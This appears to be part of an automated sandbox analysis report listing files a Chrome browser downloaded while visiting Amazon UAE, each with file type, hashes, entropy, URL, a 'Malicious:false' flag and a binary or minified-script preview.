                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.............................................................................................ir[b\V.q[..o...\V.q[..j..-......+|.....x.-......p... ..........<.%.I...Yl.o"X..2i!!4....;..-...........q........K.dd.hd.hd.................I.^I......K..(..*.k.?.~j6?@q.H..20..'..n...k.)....9-s....^.j..u....v....<..W.7.............y+t..N/..v.p...Y....U+..x...!$.BC...'..v./....Z...<..\3....V.K}..P.4=.O:.N..P...6..o..I...........|.%_.........4.....6.?.6..BT...cX.w..^........>qV..[s.T..Y.2Y.J.fK.a....a..vy.!<..W.?...............$y.49.}-7^....~..s.Is.:#.zH.B.bFHHc.6o.gX......5Db..b.U....T...<.]..!...g.we.Z...g.z.I.l..+........e..!d....7.=..m.....X...FXHG.!a.r.w...O__7o.O.\.ej(..y.<.m..|.h..Y~.K.......-q.....1...^(......./+uW)..I..c.77.g.?.U,%.i!)7.A"B.h..r.`..............
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?rid=3YMHCN1ADEMYQEW81YBE&sid=261-8635865-4706955&rx=YGez3A/KqpXJSnDux0PMbA
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 628x640, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23333
                                                                                                                                                                                                                                                                      Entropy (8bit):7.939135138578168
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:LKSK2raAji91KpTyGYgggONpdlZfpHDvyZCgoYkEj5VPoVW57zU5G:LKSKoa3+pTyGNggONpHZhHryZtoYkq51
                                                                                                                                                                                                                                                                      MD5:07F2566303E7F7FF4C4BD37CCE002747
                                                                                                                                                                                                                                                                      SHA1:78301FD62825198ACA9CFE02514CC57833FD56C2
                                                                                                                                                                                                                                                                      SHA-256:4848F1AEDB07D2CE4F0A899F8832F3F1C3DA82832CEE35CB0432B2D9738767BA
                                                                                                                                                                                                                                                                      SHA-512:59395B1FF134D8F93B70CEE2C51B3CA281CC1E862A944FCF879DF72BA989B6300775AE5EE2A90CE51C0A783A8A7C3F5BF79914159238CA287AE6FDFED6A8B6A2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61Mmgk68miL._AC_UL640_QL65_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.........................!.....+....'...'.''.#'##,'!!',#');)0+5,)8););::=BC;'BZ..........!8'.,:0.)E:C,:=::+L:C8:#;:,55,,0)0:,==;.+=8'Q+,':8B5'=H........t.."..........3.....................................................................c.OP.....<......h..;.z......J...................*.....w...b........c...!.t..G.....+.....].oy....r.....{..................[t...V..-..f>m._.9.}m3...0...OS-.. .......9Z|..h...:.j.;_...=.1..}4..hc}.{....7Zo...+.=X{Q.y....#/3K..|...q;Z.5..4B...7....v..u5...-.O;....>.....y.:.3.]/9..>.Ms.......?....GS8...c"8.5...h.......2.1............<_..X.||...x,..{.?.....lh.|.:.>W....vk.V.Z...k...5..a1.....1...=._o.x...z..=<. .......s...8.OWe...:M[j.\....,R...WMIOch.]...._................7O.Sr.7....y......GF.zG.=N.m..y.....\....s........y.7.t..=w:...K..tsu.....Ld....9...{.<W..y}\m..T....Wf.i.....6..a.[R...^_{..._o...=>.z<.....k|./...U....0......c.....S.u;..[W:..gY....z.<WT.{.Sw|;:.W..]m8.KWq<.1..Q...e......_...*..._.^.L...]..Z...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):19710
                                                                                                                                                                                                                                                                      Entropy (8bit):7.957304767435503
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1N3p5nCpU3RMNdHVXJioaTODC4Hmiae9fdieC1ErVJJae5ZydAUC7arg0:1N3pspUhMNLXJvbHmte9f7bVJkeCvDrD
                                                                                                                                                                                                                                                                      MD5:E8760449E609C1DC687FA5C3417C5D7D
                                                                                                                                                                                                                                                                      SHA1:FD0CE05C77B02184263CB08E374559053B98A0EF
                                                                                                                                                                                                                                                                      SHA-256:B68B109E0B9A904F8F43FC8F0C906070F05A56AD339DA50544322F764D9BF3F4
                                                                                                                                                                                                                                                                      SHA-512:3A007C226C308F8E9D3D1DDDC8EFA79EEA669720C7A1FBCE911936BB9355E4BF95E74C995350ED2ABE42C0336913C9269392DAC1237B81A7D5DC498BB7CB71EC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Fitness-Yoga-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................b.m3.5.b.....cO..(.....:....-......y..d...L."`....x.y2Zf.Y.k.=.+.*tl. ..0...{qX.fgo:i..i............$...I..._,..k2k..`S.+..-.....0..I..._,.c4...d.q..w.='{......D.!.qme.:..i.e............x.S..@..fa....-...c_5.+............o.......C....i`.d....K..Y........w%..&.d.a.pF/'.<.s.yO.ts.@...vn......fg.K......=..~...L.9/.f.J..k-m........o...........-.....Z.a..^o......T.$"..6k)l....^T^HW.O..k....D...........&..j.g.qsv......B+YLbc..B..E|_.....S....Q.#^q.[ZD...q.x.k.^......H$.P.s..L.A.\u.x...tq.<..\hLHJ.5k.&{Zfl....X..x...z..}.0...J51a....S...mkF....z/cL.2.(&S.&Q.Z....3$.v.}=.,~o...d...>]ba)".(.Vo{M..&.?;..wg...{+n.3....L..,..Y-i...(......M.~..}..[n|6.S...L.Y\be.Jb+..6...&^o.o..->.C7...^.x..F. D"+..ZX..G.a.._-.w.z.Z.#S.........R.G......Y.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fs-on-search-route%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26ctb%3D1%26m%3D1%26sc0%3Ds-on-search-route%26pc0%3D10497%26s-on-search-route0%3D10497%26t0%3D1724264941683%26rt%3D__%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-16%7CmutObsYes%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7Csupports%3Amutationobserver%3Atrue%7Csupports%3Agetelementsbyclassname%3Atrue%7Csupports%3Amap%3Atrue%7CmutObsActive%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Ccf_cdn_fr%7Cfy_cdn_mp%7Cadrender%3Aa6b228d9-6ecf-4580-a80f-06ec30d01262%7Cadrender%3ASearch%3Aauto-bottom-advertising-0%3Aportal-batch-fast-btf-loom%7Cadrender%3Asafeframe%3Aa6b228d9-6ecf-4580-a80f-06ec30d01262%7Cadrender%3Asafeframe%3ASearch%3Aauto-bottom-advertising-0%3Aportal-batch-fast-btf-loom%7Cadrender%3Aa6b228d9-6ecf-4580-a80f-06ec30d01262%3Acreativetemplatename%3Adynamicecommercesdciaedesktop%7Cadrender%3ASearch%3Aauto-bottom-advertising-0%3Aportal-batch-fast-btf-loom%3Acreativetemplatename%3Adynamicecommercesdciaedesktop%7Cadrender%3Aa6b228d9-6ecf-4580-a80f-06ec30d01262%3Acreativeid%3A0%7Cadrender%3ASearch%3Aauto-bottom-advertising-0%3Aportal-batch-fast-btf-loom%3Acreativeid%3A0%7Cadrender%3Aa6b228d9-6ecf-4580-a80f-06ec30d01262%3Aprogramid%3A1027%7Cadrender%3ASearch%3Aauto-bottom-advertising-0%3Aportal-batch-fast-btf-loom%3Aprogramid%3A1027%7CsafeFrame%3A8e0c4c15feaa708dde4b89323fa4b7f30304fda8%3Aadplacements%3Asearch%3Aauto-left-advertising-1%3Asearch-desktop-loom%3Aabpstatus%3Anotenabled%7CsafeFrame%3A8e0c4c15feaa708dde4b89323fa4b7f30304fda8%3Aadrender%3Asearch%3Aauto-left-advertising-1%3Asearch-desktop-loom%7CsafeFrame%3A8e0c4c15feaa708dde4b89323fa4b7f30304fda8%3Aadrender%3Asearch%3Aauto-left-advertising-1%3Asearch-desktop-loom%3Acreativeid%3A0%7CsafeFrame%3A8e0c4c15feaa708dde4b89323fa4b7f30304fda8%3Aadrender%3Asearch%3Aauto-left-advertising-1%3Asearch-desktop-loom%3Aprogramid%3A1027%7CsafeFrame%3A8e0c4c15feaa708dde4b89323fa4b7f30304fda8%3Aadrender%3Asearch%3Aauto-left-advertising-1%3Asearch-desktop-loom%3Acreativetemplatename%3Adynamicecommercesdciaedesktop%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%26viz%3Dvisible%3A4%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:10498
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):50354
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969356113927722
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:2+BpaF79Y5UZ+C/5sjkCo0G3KD1apWtdAN+f:dBpaFAc+s5sj6aApWtdAN+f
                                                                                                                                                                                                                                                                      MD5:CCEA032C567035C0AC54F72BB8AAE20D
                                                                                                                                                                                                                                                                      SHA1:061C5C8B0C5E78A3BD58B162A1B048B576C864E9
                                                                                                                                                                                                                                                                      SHA-256:9F5E5847FBCC02B660F73B9A3C9BFC5406EE2B4268A06E331418A88C46393754
                                                                                                                                                                                                                                                                      SHA-512:CA16905E047A69133A8DA957BC92C9C2084FE042569789085BAD3ACFEE7E86343531088321F5AB684204428B5C6490BCBC0515CD040038F1FEAE6D722D8ED855
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................:.................................................................................\a.....]...p.m..6..yw..T.Z..J..v....O.65...@.............l=......c.Q......v^..r...a%.!.9..yw............i..V..\...<.8..........D.6.g`m..8O.................."HZ.mt.........yP.&{F...X_.........ec..C..+1............/.lw.;&.w.@.@..........;[...E..........*.......-J....k.....=..x.......P...x.#..:r........qR..aa...8.`..V..rJ......n7"{G..............mM.r.......GT....*..o..V..p$>1.}x.>y......J....j.gm......Sr?..#H....j....s..p........mz.rO(q}{...6.+8.9U<....ls.....Fu.[[...7.yG-..Q.....v.9.A5.,..:...,...nj...~.....?......>..|..~o.._.H........!1....6........e...`.y.....{.t.....o.."f..l:...`.K.25.7.................Q....2'~..=?x...X..?.,..s3..9.&o.+^.......p......7....xs....[...`...W.}.B..%.`.....3..6q...@.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x250, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):39516
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972024116551709
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:xiqBv1n0WFDVzIk6a6XG8kPaq6Oxqp7YNLFFjCA9gfpn11KusA5q423q1:Dtn0YVzIla6W8Q64q9Y3FX9cp1ls+qxK
                                                                                                                                                                                                                                                                      MD5:C67B003EAD831C68E0FF99D36099E1A3
                                                                                                                                                                                                                                                                      SHA1:1513958AC2F0A22C952F6DE05178A1F3FBCE056C
                                                                                                                                                                                                                                                                      SHA-256:D5A9CB812FE2A02197421420D1802E038CAF7EF079E262D003EC1F23E73D0E75
                                                                                                                                                                                                                                                                      SHA-512:CF06A5C33B72F16CA1157A4CDB9B95C22C2174ED67D6BA10DAA25228F578A5D48338E80AB9F6C3464E59BA62FD6834BA196830D1F6BAE14F595484213F99A42E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C....................................................................C.........................................................................,..............................................T..............................!.1."AQ.2a.#Bq.$R..b....%349Sr...67CTcsuvw.............................................I..........................!1A.."Qaq..2....BR....#b...4r.....$Sc.5s%3...............?..~...%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.*..p.L.FV......_.;%H#.gZ.x...-...S.....e.P....1. P..5.....6.T.R.y..../...m=....W.};.+..U......QX.d.+g.t......... ^&.....i.sJ.C. y.........m.%.'.|...X..OMm=..P.V......t..W....=.&R..Fq.......Y....fL...w...W.?...7.4....w.V.S...X..y.7.#....Ts.v.:wY......g..4Ceh...W.,.le.#*H.C..-R&.JpQ.A.R0..P1H.pz...P-o..s.{.p.1;.J....q{.o.Y......OL<Mn..C.2..N@..$,+.=..[..l.v.<Y.D}.f.~@M4LE...16.R.X~-..<.;i.q......0.8.d........^............i...`.......U.\[.X..P2.A.U..=.`.....c.z.Qc..........7....}..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2504
                                                                                                                                                                                                                                                                      Entropy (8bit):7.683203594367942
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:q0fVRckJT428RUXeB6hSTJpau2y2xFNaxGIkamZRUsKenYpP94jbyqg2:JNRcM1zhETjVsFkuamZRUsOP9Dqz
                                                                                                                                                                                                                                                                      MD5:F90AA3D3F370FAF9FA196089CD86EEF9
                                                                                                                                                                                                                                                                      SHA1:4B1D37029773AC6C057C774954EB0C83B647FE23
                                                                                                                                                                                                                                                                      SHA-256:E59FC503FD4CC663A537D942E7FE4CC5D05BD505C22BEFA575A9B9263C08F30B
                                                                                                                                                                                                                                                                      SHA-512:4896EC010B3F83A5D41FE00A3D7139C3ED868E7C9893326B01C6270557B153244E4362D32C084451B807F0F312D131C4B1D197195CAB996BC15C9578248C52B3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........7......................................................................q`...=.E+.YC.............:.S.s!h;o'a?\..]...l.........g...t}.....}....R.z3$.o........=..Y...B.h....!Ku|.nZwT....;k.l ......V......SUR..12..~rW.)=,.Bd.....i.&..b.~../.z'&^L.J.....T&@......3,.................?...9............................#3..$@CS.....s!"14DPc...AB.........?..E.Y...t..e6KH.......h..'HX...fK.......- ....Gv......vV..k.~..g....a.Y..,q).OP......g........^.dL<..+,....1.y.[...oQ1(./.0.....(..........q.<..Az..+*...A..b.lwK.W9...YK.....O...Zae.D.ef."....."t.2yM.:..4......R.k&.......$...B..._mQ[.....r~bY.3qb,.O.[......bY..^.e^W...B...{b.3...G.=P.X..K.TYu.m...2....H.)..8..*.Io.....^....Wv.d.F>...J....'._).m-..G+....w....Q7......lWq.....rQ.4...b....V.Or.V...K+.DD2..D};_'..........kQ..."..E.h..~..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 194 x 295, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):45977
                                                                                                                                                                                                                                                                      Entropy (8bit):7.985058314720174
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Ox2kO+0B5izHhTPdZVliVcR3+/ku/iUYi09ERbCC4lxOQ3JZT9AlpsyjSB:OAkp45izBXfNR35u/izi2GbHU3X9An8B
                                                                                                                                                                                                                                                                      MD5:A824C7A90E2C465DA4C4DB9FD9FC15E4
                                                                                                                                                                                                                                                                      SHA1:36F46FBD4D03D1E55BC0B0D4381D351620750532
                                                                                                                                                                                                                                                                      SHA-256:6641FF165206F0F54CD94518DED93DFCBFC7436A806B0DE96991CB3DA4032A8B
                                                                                                                                                                                                                                                                      SHA-512:AF530AF8E111A8B7DA4C2776253E6BDFD295E2A84A11EBCC020024E6B8364C6D75AC2C8BAE725D6441036BB3F163E74410F87F9C9B031417F16DA330C5C708DC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/Z8YwjOjqIHxqujG.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......'.............gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (571)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):369969
                                                                                                                                                                                                                                                                      Entropy (8bit):5.380624260002934
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:ZYCYcQZMuZ7q9P1+pKbayIAmk1Xaq/LTCz6PHaL5gYI5B6iSVMbN/vYSidNII:ZtYXUMKbaaP6LWY6bNXYSidNII
                                                                                                                                                                                                                                                                      MD5:E84CA3D67EBD8F4F8565277777769592
                                                                                                                                                                                                                                                                      SHA1:2E2F1CAA13EEB4D7B28C70CF8F1CEC1307773045
                                                                                                                                                                                                                                                                      SHA-256:5876F379D5EA8DFC1E5F810E5A76303CE84EC2C78A088D282975F13CD20F4129
                                                                                                                                                                                                                                                                      SHA-512:4E435E2D8E869BFC17C90DC26842E6F6904CE943DDFE43E60A486EA5467488AC6944B41CB93CA6F95E0CE739327DD055B00513549415732DA22963E95A90C4C3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://images-eu.ssl-images-amazon.com/images/I/11B2bsTfmvL._RC%7C61xJcNKKLXL.js,11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw"
                                                                                                                                                                                                                                                                      Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):12070
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8638389793997465
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:maoAcDm2c6LbPUas2l9n0eoex16zLqOHOo5spW785mYYZWtNf63bSk+OVuIq:LcDm2c6LbMas2TJyLTHOgQ5sWT6rYvV
                                                                                                                                                                                                                                                                      MD5:61ABDCDA334F33498CDB83853BBC5B33
                                                                                                                                                                                                                                                                      SHA1:C80E68FEC3B38E203B530CD926276C4CFD7AB231
                                                                                                                                                                                                                                                                      SHA-256:48B7B628176B24B54FE89624C4B19B49596D6F13B8F52EA69119ADF115CD61D6
                                                                                                                                                                                                                                                                      SHA-512:ED40416C5DA5762FB5155FA5E906FF9DEB63B85DD49ABC4F976E4F333C3392C76B6EF191A2A925F68F1FD66BD15F5A02193FD106A453DAEE749871A38C9D4A81
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................................................................................................................................................<...Ac...XoKE87..T....M.h]&.4".~Z.I............T.A.=i>.>xP}.|..,..I.m.....'.W.q.....`.......0.`...k>u7..S.4.T.._.p(..:e....!I....ED...'.4MA.2.ED..s....y.Y.5./.....;.@......M..a.....X.-......p.<[...$..I51pI.T.S....I]4FIE..Q."..4..O..QU...$o~...P.........aDt..qD..$.Kzo...S.q.n6..q.....>...6.(e...3L...j.M...f.LkSf$.cl...U.....<G.*^...J.rd............;~.|.0......]$..^....M,.t..[O.<.K.\Ok?U..n\Ko6.SZN\.k=..[Km....5.1$.Me.a....;....^....W4.&o....P........O.a.8..~+...$....H..Ya.i.....n..kY..f......].f..V.{I...'......!...../z...q.....?.K./.o.w.+\..Z..7!@......_.O.F..}..H...y.j.I..M...^..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):29265
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946188922439126
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:CabFw5+EsxZH34LmuZaRejUhWohoiafSNqGWxPnf:CaA2juZQYw/aaNqPnf
                                                                                                                                                                                                                                                                      MD5:5E0F7632D346F9C989ECA9331F52C0B8
                                                                                                                                                                                                                                                                      SHA1:94CC50E274E962CD7A3F04BB3D9666D6278B8F9D
                                                                                                                                                                                                                                                                      SHA-256:79556141873686D84A68BACDA7B10A6378D1F449972C947AC5A4C652E765B2BD
                                                                                                                                                                                                                                                                      SHA-512:90F51C10E241245251683A859EEE6EE36EC00EF36E52F89E5301B76201379F46E46635C7E1E1A6C7DA5C6DAF1F2C9AF9E270AF1E2829ADBAA963683704C6A5E3
                                                                                                                                                                                                                                                                      Malicious:false
